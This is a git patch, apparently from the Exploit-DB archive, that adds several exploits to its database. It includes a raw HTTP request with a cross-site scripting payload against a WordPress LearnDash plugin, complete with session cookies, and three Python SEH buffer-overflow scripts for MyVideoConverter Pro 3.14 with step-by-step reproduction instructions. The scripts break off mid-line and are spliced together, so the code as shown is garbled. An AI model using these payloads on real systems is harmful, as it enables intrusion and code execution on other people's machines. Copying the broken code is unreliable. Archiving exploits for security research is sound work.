From 875c0a939645057689a8fb53762b539f87aac294 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 13 Feb 2020 05:02:00 +0000 Subject: [PATCH] DB: 2020-02-13 11 changes to exploits/shellcodes xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation SunOS 5.10 Generic_147148-26 - Local Privilege Escalation MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow HP System Event Utility - Local Privilege Escalation --- exploits/{openbsd => multiple}/local/45922.sh | 0 exploits/php/webapps/48030.txt | 11 +++ exploits/{multiple => solaris}/local/47932.c | 0 exploits/windows/local/48054.py | 53 ++++++++++++ exploits/windows/local/48055.py | 53 ++++++++++++ exploits/windows/local/48056.py | 53 ++++++++++++ exploits/windows/local/48057.txt | 83 +++++++++++++++++++ files_exploits.csv | 8 +- 8 files changed, 259 insertions(+), 2 deletions(-) rename exploits/{openbsd => multiple}/local/45922.sh (100%) rename exploits/{multiple => solaris}/local/47932.c (100%) create mode 100755 exploits/windows/local/48054.py create mode 100755 exploits/windows/local/48055.py create mode 100755 exploits/windows/local/48056.py create mode 100644 exploits/windows/local/48057.txt diff --git a/exploits/openbsd/local/45922.sh b/exploits/multiple/local/45922.sh similarity index 100% rename from exploits/openbsd/local/45922.sh rename to exploits/multiple/local/45922.sh diff --git a/exploits/php/webapps/48030.txt b/exploits/php/webapps/48030.txt index 028c20352..47adcefad 100644 --- a/exploits/php/webapps/48030.txt +++ b/exploits/php/webapps/48030.txt @@ -20,6 +20,17 @@ Once the user is logged in to the WordPress website where the vulnerable LearnDa An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions. +GET /wp-admin/admin-ajax.php?action=ld30_ajax_profile_search&shortcode_instance%5Buser_id%5D=1&shortcode_instance%5Bper_page%5D=20&shortcode_instance%5Border%5D=DESC&shortcode_instance%5Borderby%5D=ID&shortcode_instance%5Bcourse_points_user%5D=yes&shortcode_instance%5Bexpand_all%5D=false&shortcode_instance%5Bprofile_link%5D=true&shortcode_instance%5Bshow_header%5D=yes&shortcode_instance%5Bshow_quizzes%5D=true&shortcode_instance%5Bshow_search%5D=yes&shortcode_instance%5Bquiz_num%5D=20&shortcode_instance%5Bpaged%5D=1&shortcode_instance%5Bs%5D=&ld-profile-search=%3Cscript%3Ealert(123)%3C%2Fscript%3E HTTP/1.1 +Host: learndashtesting.com +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Referer: http://learndashtesting.com/my-account-2/ +Cookie: wordpress_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7C7ec9ebfd67acdbc669395821f620198e67cb74780c9a8db63923b528aa661acd; PHPSESSID=e7c30849dbdab6f1cafcccef0ad7e7a0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7Cfcf64acbc9b6ba7aaafb9c3b077581347d65ca8e010135cc232dcfc0335ec6d8; wordpress_cf_adm_use_adm=1; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg; wp-settings-time-1=1581331685 + 3. Timeline Vulnerability reported to the LearnDash team – January 14, 2020 diff --git a/exploits/multiple/local/47932.c b/exploits/solaris/local/47932.c similarity index 100% rename from exploits/multiple/local/47932.c rename to exploits/solaris/local/47932.c diff --git a/exploits/windows/local/48054.py b/exploits/windows/local/48054.py new file mode 100755 index 000000000..d07804851 --- /dev/null +++ b/exploits/windows/local/48054.py @@ -0,0 +1,53 @@ +#Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow +#Exploit Author : ZwX +#Exploit Date: 2020-02-11 +#Vendor Homepage : http://www.ivideogo.com/ +#Tested on OS: Windows 10 v1803 +#Social: twitter.com/ZwX2a + + +## Steps to Reproduce: ## +#1. Run the python exploit script, it will create a new file with the name "Shell.txt". +#2. Just copy the text inside "Shell.txt". +#3. Start the program. In the new window click "Add" > "Convert DVD" > "Movie" . +#4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..." +#5. The calculator runs successfully + + +#!/usr/bin/python + +from struct import pack + +buffer = "\x41" * 268 +nseh = "\xeb\x06\xff\xff" +seh = pack(" "Settins" . +#4. Now paste the content of "exploit.txt" into the field: "Output Folder" > Click "..." +#5. The calculator runs successfully + + +#!/usr/bin/python + +from struct import pack + +buffer = "\x41" * 268 +nseh = "\xeb\x06\xff\xff" +seh = pack(" "Convert DVD" > "TVSeries" . +#4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..." +#5. The calculator runs successfully + + +#!/usr/bin/python + +from struct import pack + +buffer = "\x41" * 268 +nseh = "\xeb\x06\xff\xff" +seh = pack("